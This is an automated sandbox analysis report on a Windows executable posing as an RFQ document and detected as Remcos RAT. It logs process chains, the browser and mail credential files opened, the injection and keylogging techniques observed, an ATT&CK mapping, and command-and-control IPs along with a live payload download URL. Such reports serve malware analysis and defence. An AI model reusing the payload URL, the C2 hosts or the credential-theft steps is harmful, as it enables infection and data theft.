              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"
              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"
              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\irnfnubnwufuubhrkbjztnmhqi"
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerneer
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
              Source: msiexec.exe, 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager7IL
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerS
              Source: msiexec.exe, 0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\*
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager)!
              Source: msiexec.exe, 0000000E.00000002.3394879441.000000000568A000.00000004.00000020.00020000.00000000.sdmp, logs.dat.14.dr Binary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_21202933 cpuid 14_2_21202933
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_21202264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,14_2_21202264
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,19_2_004082CD
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040344A

              Stealing of Sensitive Information

Source: Yara match | File source: 0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2898152047.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2899931678.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3391979783.000000000287F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2896409361.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 4552, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | Code function 19_2_004033F0: ESMTPPassword
Source: C:\Windows\SysWOW64\msiexec.exe | Code function 19_2_00402DB3: _mbscpy, _mbscpy, _mbscpy, _mbscpy, PopPassword
Source: C:\Windows\SysWOW64\msiexec.exe | Code function 19_2_00402DB3: _mbscpy, _mbscpy, _mbscpy, _mbscpy, SMTPPassword
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 4552, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 2196, type: MEMORYSTR

              Remote Access Functionality

Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-HSAM04
Source: Yara match | File source: 0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2898152047.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2899931678.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3391979783.000000000287F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2896409361.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 4552, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
MITRE ATT&CK Matrix (one line per tactic; the number shown beside a technique in the original matrix cell is given here in parentheses, techniques without a number carried no count):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1); Native API (11); Command and Scripting Interpreter (2); PowerShell (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (412); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (11); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (412); HTML Smuggling
Credential Access: OS Credential Dumping (1); Input Capture (11); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (37); Security Software Discovery (41); Virtualization/Sandbox Evasion (31); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Input Capture (11); Clipboard Data (2); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (112); Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1577287, sample: RFQ NO 65-58003.exe, start date: 18/12/2024, architecture: WINDOWS, score: 100). The graphic itself is not reproduced; the nodes and edges it shows are:

• Start node: DNS lookup geoplugin.net; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Antivirus detection for URL or domain, 8 other signatures
• RFQ NO 65-58003.exe (started, 25 created files): drops C:\Users\user\AppData\...\Rygklapperne.Tis225 (Unicode); signature: Suspicious powershell command line found; starts powershell.exe
• svchost.exe (started): contacts 127.0.0.1 (unknown)
• powershell.exe (started by RFQ NO 65-58003.exe, 28 created files): signatures: Early bird code injection technique detected, Writes to foreign memory regions, Found suspicious powershell code related to unpacking or dynamic code loading, 2 other signatures; starts msiexec.exe and conhost.exe
• msiexec.exe (started by powershell.exe): contacts 212.162.149.91 (ports 2404, 49874, 49880; UNREAL-SERVERSUS, Netherlands), 212.162.149.92 (ports 49868, 80; UNREAL-SERVERSUS, Netherlands) and geoplugin.net 178.237.33.50 (ports 49881, 80; ATOM86-ASATOM86NL, Netherlands); drops C:\ProgramData\remcos\logs.dat (data); signatures: Detected Remcos RAT, Tries to steal Mail credentials (via file registry), Maps a DLL or memory area into another process, Installs a global keyboard hook; starts three further msiexec.exe instances and 2 other processes
• msiexec.exe (child instance): signature: Tries to harvest and steal browser information (history, passwords, etc)

Antivirus Detection (Source | Detection | Scanner | Label):
RFQ NO 65-58003.exe | 14% | Virustotal | 
RFQ NO 65-58003.exe | 8% | ReversingLabs | Win32.Trojan.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches

URL Antivirus Detection (Source | Detection | Scanner | Label):
http://212.162.149.92/FbuhjxbSFSc116.binR | 0% | Avira URL Cloud | safe
http://212.162.149.92/FbuhjxbSFSc116.bin | 100% | Avira URL Cloud | malware
http://www.imvu.compData | 0% | Avira URL Cloud | safe
Contacted Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
geoplugin.net | 178.237.33.50 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://geoplugin.net/json.gp | false | | high
http://212.162.149.92/FbuhjxbSFSc116.bin | false | Avira URL Cloud: malware | unknown
URLs from Memory and Binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
https://www.google.com | msiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://geoplugin.net/json.gphyq | msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod1C: | qmgr.db.13.dr | false | | high
http://www.imvu.comr | msiexec.exe, 0000000E.00000002.3407723975.00000000211D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpl | msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://212.162.149.92/FbuhjxbSFSc116.binR | msiexec.exe, 0000000E.00000002.3394879441.000000000568A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.compData | msiexec.exe, 00000014.00000003.2903653103.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2903681348.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gphy | msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.imvu.com | msiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000003.2903653103.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2903681348.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 0000000D.00000003.2526974098.000002B99ED30000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr | false | | high
http://crl.ver) | svchost.exe, 0000000D.00000002.3394216616.000002B99EE0F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/accounts/servicelogin | msiexec.exe | false | | high
https://login.yahoo.com/config/login | msiexec.exe | false | | high
http://www.nirsoft.net | msiexec.exe, 00000011.00000002.2923342242.0000000002C74000.00000004.00000010.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | RFQ NO 65-58003.exe | false | | high
http://www.nirsoft.net/ | msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | msiexec.exe, 0000000E.00000002.3407723975.00000000211D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp_ | msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.live | msiexec.exe, 00000011.00000002.2923434065.0000000002CBA000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.ebuddy.com | msiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
Contacted Public IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
212.162.149.91 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | true
212.162.149.92 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false

Private IPs:
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577287
Start date and time: 2024-12-18 11:03:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ NO 65-58003.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@28/20@1/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 151
• Number of non-executed functions: 348
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 92.122.16.236, 20.231.128.67, 20.199.58.43, 13.107.246.63, 2.16.158.27, 172.202.163.200, 20.223.36.55, 150.171.27.10, 2.16.158.74, 20.223.35.26
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
